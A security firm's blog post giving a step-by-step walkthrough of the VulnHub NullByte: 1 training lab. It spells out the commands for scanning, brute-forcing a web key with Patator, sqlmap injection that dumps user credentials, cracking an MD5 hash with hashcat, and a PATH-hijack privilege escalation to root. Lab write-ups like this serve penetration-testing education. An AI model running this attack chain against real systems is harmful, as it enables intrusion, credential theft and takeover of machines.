NuHarbor Security
  • Solutions
    Solutions
    Custom cybersecurity solutions that meet you where you are.
    • Overview
    • Our Approach
    • Data Icon Resources
    • Consultation Icon Consult with an expert
    • By Business Need
      • Identify Gaps in My Cybersecurity Plan
      • Detect and Respond to Threats in My Environment
      • Fulfill Compliance Assessments and Requirements
      • Verify Security With Expert-Led Testing
      • Manage Complex Cybersecurity Technologies
      • Security Monitoring With Splunk
    • By Industry
      • State & Local Government
      • Higher Education
      • Federal
      • Finance
      • Healthcare
      • Insurance
    Report 2023-2024 SLED Cybersecurity Priorities Report
    2023-2024 SLED Cybersecurity Priorities Report
    Read Report
  • Services
    Services
    Outcomes you want from a team of experts you can trust.
    • Overview
    • Data Icon Resources
    • Consultation Icon Consult with an expert
    • Security Testing
      • Penetration Testing
      • Application Penetration Testing
      • Vulnerability Scanning
      • Wireless Penetration Testing
      • Internal Penetration Testing
      • External Penetration Testing
    • Assessment & Compliance
      • CMMC Compliance
      • NIST 800-53
      • HIPAA Security Standards
      • ISO 27001
      • MARS-E Security Standards
      • New York Cybersecurity (23 NYCRR 500)
      • Payment Card Industry (PCI)
    • Advisory & Planning
      • Security Strategy
      • Incident Response Planning
      • Security Program Reviews
      • Security Risk Assessments
      • Virtual CISO
      • Policy Review
    • Managed Services
      • Curated Threat Intelligence
      • Managed Detection and Response (MDR)
      • Sentinel Managed Extended Detection and Response (MXDR)
      • SOC as a Service
      • Splunk Managed Services
      • Tenable Managed Services
      • Vendor Security Assessments
      • Vulnerability Management
      • Zscaler Support Services
    Report 2023-2024 SLED Cybersecurity Priorities Report
    2023-2024 SLED Cybersecurity Priorities Report
    Read Report
  • Partners
  • Resources
    Resources
    Explore reports, webinars, case studies, and more.
    • Browse Resources
    • Consultation Icon Consult with an expert
    • Blog icon Blog
    • Podcast icon Podcast
    • Annual SLED CPR icon Annual SLED CPR
    • Downloadable Assets icon Downloadable Assets
    Report 2023-2024 SLED Cybersecurity Priorities Report
    2023-2024 SLED Cybersecurity Priorities Report
    Read Report
  • Company
    Company
    We do cybersecurity differently – the right way.
    • Overview
    • Data Icon Resources
    • Consultation Icon Consult with an expert
    • Leadership
    • News
    • Careers
    • Contact
    Report 2023-2024 SLED Cybersecurity Priorities Report
    2023-2024 SLED Cybersecurity Priorities Report
    Read Report
  • Consult with an expert
  • Client support
  • Careers
  • Contact
1.800.917.5719
NuHarbor Security Blog
    • Compliance
    • Cybersecurity Technology
    • Security Operations
    • Industry Insights
    • Security Testing
    • Advisory and Planning
    • Application Security
    • Managed Detection and Response
    • Threat Intelligence
    • NuHarbor
    • Managed Services
    • Cyber Talent
May 31, 2018

NullByte: 1 Walkthrough

NuHarbor Security

It's that time again! Time to practice our penetration testing skills and tactics, that is. NullByte: 1 is another root-the-box type challenge that can be found on http://vulnhub.com. Like other challenges on the site, the goal is to read the flag hidden in the root directory of the server, but you have to exploit your way to the root first. For this walkthrough we'll be using a KALI 2.0 virtual machine as our attack host. Without further delay, let's dive into NullByte: 1!

Let's start by powering on the VM and doing a quick Nmap sweep to find the IP address that the box has been assigned. You'll recall from a previous blog (Application Security Testing Tutorial via Rooting Hackademics RTB1) that we'll be looking for a machine with a "Vmware" network card manufacturer. Yours may be different, depending on what software you're using to run the VM. We can also assume that this vulnerable machine will probably be running a webserver on port 80.

nmap -T4 -sV -p80 192.168.100.0/24

NullByte1

There we go! With an IP address it's time to check out what other services this box may be hosting. Running a more in-depth Nmap scan will give us that information.

nmap -T4 -A 192.168.100.131

NullByte2

Aside from RPC and SSH running on port 777, there's not much to go off of here. Let's see what pages the webserver is handing out by navigating to the IP address in a web browser.

NullByte3

With only a single static page, the next step is to run some directory brute-forcers and vulnerability scans against the web server. We've decided to do both a Nikto scan and a Dirb scan to see what kind of results we could find.

nikto -host >http://192.168.100.131

NullByte4

dirb http://192.168.100.131

NullByte5

Aside from a few directories and a unique header, there doesn't appear to be a whole lot going on that catches our attention. Let's save ourselves the time of manually checking these discovered pages and move on to the image on the homepage. Perhaps there was a hint hidden in this image, perhaps in the form of steganography.

We can wget the image from the webserver and, as a rule of thumb, check the exifdata before all else.

wget http://192.168.100.131/main.gif

exiftool main.gif

NullByte6

It seems we've lucked out and discovered what appears to be some sort of cipher hidden in the comment section of the EXIF data.

Now, admittedly, we spent a fair amount of time playing with this string. We tried using it as an SSH password, brute forcing known ciphers against it to see if it was in fact an encoded value, and even using it as a phpmyadmin password. After many failed attempts, however, we made a desperate attempt to use it as a directory name on the web server. Lo and behold, it worked!

http://192.168.100.131/KzMb5nVYJw

NullByte7

It appears to be a page asking for a key where, if we inspect the page source, we can find a hint that suggests brute-forcing may be the way to go. At this point, we could write a script to brute force the key, but let's not reinvent the wheel. In an attempt to broaden our horizons, we decided to use a tool on KALI 2.0 called Patator.

patator http_fuzz url=http://192.168.100.131/KzMb5nVYJw/index.php method=POST body='key=FILE0' 0=~/wordlists/rockyou.txt follow=1 accept_cookies=1 -x ignore:fgrep='invalid key'

NullByte8

In almost no time at all we have the proper key, "elite"! Inputting the key brings us to the following form:

NullByte10

Recalling that the hint from earlier said, "this form isn't connected to mysql," we jumped right into sqlmap.

sqlmap -u http://192.168.100.131/kzMb5nVYJw/420search.php?usrtosearch=test --dbs

NullByte9

Bingo. Noticing the database named "seth," let's enumerate the tables and then the columns.

sqlmap -u http://192.168.100.131/kzMb5nVYJw/420search.php?usrtosearch=test -D seth --tables

NullByte11

sqlmap -u http://192.168.100.131/kzMb5nVYJw/420search.php?usrtosearch=test -D seth -T users --columns

NullByte12

We have a good feeling about this database. Let's dump the values.

sqlmap -u http://192.168.100.131/kzMb5nVYJw/420search.php?usrtosearch=test -D seth -T users -C id,users,pass --dump

NullByte13

It looks that the pass for ramses is a hashed value at first peek, but we know a base64 string when we see one. Decoding the base64 value gives us the actual hash. Note we add a "=" to the string so that base64 can properly decode it.

echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=" | base64 -d

NullByte14

With the actual MD5 hash we can use hashcat and the rockyou.txt wordlist to crack it:

echo "c6d6bd7ebf806f43c76acc3681703b81" > hash

hashcat -m 0 -a 0 hash ~/wordlists/rockyou.txt

NullByte15

Now with the user ramses and the password omega, it's time to figure out what these credentials are for. Trying to log into SSH with these credentials proves successful. Remember from earlier that the ssh port is 777.

ssh ramses@192.168.100.131 -p 777

NullByte16

We now have a shell on the system and the final step is to escalate to root to read the flag in /root/. We can start by checking the .bash_history for any hints.

cat .bash_history

NullByte17

It appears that a previous user was running a binary called procwatch in /var/www/backup.

Let's check out this procwatch binary.

NullByte18

Notice that the file is owned by root and has the sticky bit permission set. This must be our ticket to gaining root privileges. We can grab this file and debug it with gdb-peda to see how it's working. However, after running it, we have a feeling it's using the "ps" command in some way.

NullByte19

NullByte20

Notice the sections highlighted in yellow above; the binary is simply calling "ps" from the system as an argument. Knowing this, we should be able to easily exploit this by modifying the $PATH environment variable on the NullByte: 1 box. Let's rename /bin/sh to ps and point the PATH to it.

cd /var/www/backup

ln -s /bin/sh ps

export PATH=.:$PATH

./procwatch

id

NullByte21

And there we have it, a root shell!

Last but not least, let's read the flag.

NullByte22

Included Topics

  • Cybersecurity Technology,
  • Security Testing

Related Posts

Cybersecurity Technology 3 min read
Onboarding Tripwire data into Splunk Read More
Compliance 2 min read
Policy and Procedure, 23 NYCRR 500 Read More
3 min read
The Top Five Critical Vulnerabilities We Uncover in Pen Tests (And What They Mean for Your Security)
Read More

Subscribe via Email

Subscribe to our blog to get insights sent directly to your inbox.

Subscribe Here!

Latest Pwned episodes

Episode 200 - Reflections of Pwned...Until Next Time
April 03, 2024
Episode 200 - Reflections of Pwned...Until Next Time
Listen Now
Episode 199 - When a BlackCat Crosses Your Path...
March 21, 2024
Episode 199 - When a BlackCat Crosses Your Path...
Listen Now
Episode 198 - Heard it Through the Grapevine - Beyond the Beltway, 2024
March 08, 2024
Episode 198 - Heard it Through the Grapevine - Beyond the Beltway, 2024
Listen Now
NuHarbor Security logo
NuHarbor Security

553 Roosevelt Highway
Colchester, VT 05446

1.800.917.5719

  • Solutions
  • Services
  • Partners
  • Resources
  • Company
  • Contact
  • Privacy Policy
Connect
  • Twitter
  • Linkedin
  • YouTube
©2025 NuHarbor Security. All rights reserved.